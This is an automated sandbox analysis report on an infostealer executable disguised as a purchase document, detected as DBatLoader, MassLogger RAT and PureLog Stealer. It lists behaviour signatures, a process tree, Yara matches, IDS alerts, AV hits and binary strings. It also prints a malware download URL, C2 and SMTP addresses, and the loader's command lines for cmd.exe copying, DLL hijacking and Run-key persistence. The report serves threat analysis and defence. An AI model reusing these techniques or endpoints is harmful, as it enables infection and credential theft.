Windows Analysis Report
PURCHASE REQUIRED DETAILS 000487958790903403.exe

Overview

General Information

Sample name: PURCHASE REQUIRED DETAILS 000487958790903403.exe
Analysis ID: 1572131
MD5: cbeea46a413d2f3d7166104d79788062
SHA1: 6bca74ac8ef6b5a5377dbd0cac8ce783dda2b080
SHA256: 5250d7820ffe465180b022c710bb170b02d1aeb8fbb4c530c5e039d4259009ef
Tags: exe, user-abuse_ch

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
AI detected suspicious sample
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • PURCHASE REQUIRED DETAILS 000487958790903403.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe" MD5: CBEEA46A413D2F3D7166104D79788062)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7912 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8164 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 940 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 1592 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2528 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 2776 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 4196 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 6896 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7644 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 7948 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ymafvvdS.pif (PID: 7996 cmdline: C:\Users\Public\Libraries\ymafvvdS.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • armsvc.exe (PID: 8124 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: BD3B960B1EFB321AF06FE54D1D30C855)
  • alg.exe (PID: 7276 cmdline: C:\Windows\System32\alg.exe MD5: 1F7F4AE415948A1027E513F2D23B8A5B)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3556 cmdline: C:\Windows\system32\AppVClient.exe MD5: 500275C60FCB5B035FD81A2BA2CB2073)
  • FXSSVC.exe (PID: 2876 cmdline: C:\Windows\system32\fxssvc.exe MD5: 3117CDDE7FDB0851FDBCA3E7FDB7A142)
  • elevation_service.exe (PID: 4192 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 6A2E9C13C2A578F9FC128F26D48FC3D7)
  • maintenanceservice.exe (PID: 6184 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 5AF7A965937863A10C99D5EC19A974A5)
  • msdtc.exe (PID: 6556 cmdline: C:\Windows\System32\msdtc.exe MD5: 7AE7553BA674284A076D19A633F7EFF0)
  • PerceptionSimulationService.exe (PID: 3436 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 93CC0F7EAE7D58C22855106B435E4B64)
  • perfhost.exe (PID: 5508 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: B5FDD433E07825BDB9C6B8F563B00FDE)
  • Locator.exe (PID: 7508 cmdline: C:\Windows\system32\locator.exe MD5: 979F07784823EB9149D134FBAB0B4376)
  • SensorDataService.exe (PID: 6228 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 3F2AB6CB57E7A0604E4E19795A526BD3)
  • snmptrap.exe (PID: 7420 cmdline: C:\Windows\System32\snmptrap.exe MD5: 9E84CEFC497519C8483A6623FAD6ED3D)
  • Spectrum.exe (PID: 4120 cmdline: C:\Windows\system32\spectrum.exe MD5: 07D3656AD4DF3DADDEDA88F101DE735C)
  • ssh-agent.exe (PID: 7624 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: A5F4C6CB650242AC4B9D281D7FB3AD95)
  • TieringEngineService.exe (PID: 7832 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: ADFE5C8879C41AEA47D22E19AC1F0F44)
  • AgentService.exe (PID: 6980 cmdline: C:\Windows\system32\AgentService.exe MD5: 11EB7B63D45B07D2E9811E4D818A0174)
  • vds.exe (PID: 5320 cmdline: C:\Windows\System32\vds.exe MD5: 680F459932662444F71FD678EBDF4171)
  • cleanup
Malware configuration (DBatLoader): {"Download Url": ["https://lwaziacademy.com/royal/233_Sdvvfamydeo"]}
Yara matches in memory dumps (Source | Rule | Description | Author; matched strings listed below the entry where the report shows them)

00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 5F 88 44 24 2B 88 44 24 2F B0 80 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches in unpacked PE files (Source | Rule | Description | Author)

9.3.ymafvvdS.pif.24742da8.17.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
9.3.ymafvvdS.pif.24742da8.17.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.3.ymafvvdS.pif.24742da8.17.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x19948:$a1: get_encryptedPassword
  • 0x1991c:$a2: get_encryptedUsername
  • 0x199e0:$a3: get_timePasswordChanged
  • 0x198f8:$a4: get_passwordField
  • 0x1995e:$a5: set_encryptedPassword
  • 0x1972b:$a7: get_logins
  • 0x18c99:$a8: GetOutlookPasswords
  • 0x181ad:$a9: StartKeylogger
  • 0x16c07:$a10: KeyLoggerEventArgs
  • 0x16bd6:$a11: KeyLoggerEventArgsEventHandler
  • 0x197ff:$a13: _encryptedPassword
9.3.ymafvvdS.pif.24590000.925.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
9.3.ymafvvdS.pif.24590000.925.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Sigma rule matches (Source | Author | Data)

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessId: 7608, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\ymafvvdS.pif, NewProcessName: C:\Users\Public\Libraries\ymafvvdS.pif, OriginalFileName: C:\Users\Public\Libraries\ymafvvdS.pif, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe", ParentImage: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ParentProcessId: 7608, ParentProcessName: PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessCommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, ProcessId: 7996, ProcessName: ymafvvdS.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Sdvvfamy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdvvfamy
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 54.244.188.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\ymafvvdS.pif, Initiated: true, ProcessId: 7996, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Sdvvfamy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdvvfamy
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\ymafvvdS.pif, NewProcessName: C:\Users\Public\Libraries\ymafvvdS.pif, OriginalFileName: C:\Users\Public\Libraries\ymafvvdS.pif, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe", ParentImage: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ParentProcessId: 7608, ParentProcessName: PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessCommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, ProcessId: 7996, ProcessName: ymafvvdS.pif
Source: Network Connection | Author: frack113 | Data: DestinationIp: 103.20.200.105, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\ymafvvdS.pif, Initiated: true, ProcessId: 7996, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49725
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)

2024-12-10T07:05:23.409269+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49707 | 41.185.8.252 | 443 | TCP
2024-12-10T07:05:54.224970+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.9 | 51600 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:56.230614+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.9 | 62925 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:42.927993+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.9 | 49551 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:46.083996+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.9 | 64135 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:42.961779+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.9 | 49718 | TCP
2024-12-10T07:05:44.675082+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.9 | 49720 | TCP
2024-12-10T07:05:46.096205+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.9 | 49723 | TCP
2024-12-10T07:05:42.961779+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.9 | 49718 | TCP
2024-12-10T07:05:44.675082+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.9 | 49720 | TCP
2024-12-10T07:05:46.096205+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.9 | 49723 | TCP
2024-12-10T07:05:36.654151+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49710 | 158.101.44.242 | 80 | TCP
2024-12-10T07:05:45.913984+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49710 | 158.101.44.242 | 80 | TCP
2024-12-10T07:05:36.062119+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 54.244.188.177 | 80 | TCP
2024-12-10T07:06:43.512348+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49737 | 82.112.184.197 | 80 | TCP


AV Detection

Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Avira: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/royal/233_Sdvvfamydeo"]}
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | ReversingLabs: Detection: 36%
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Virustotal: Detection: 43%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.9:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: ymafvvdS.pif, 00000009.00000003.1580591877.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ssh-agent.pdb source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVClient.pdb source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdb source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: ymafvvdS.pif, 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
Source: Binary string: MsSense.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
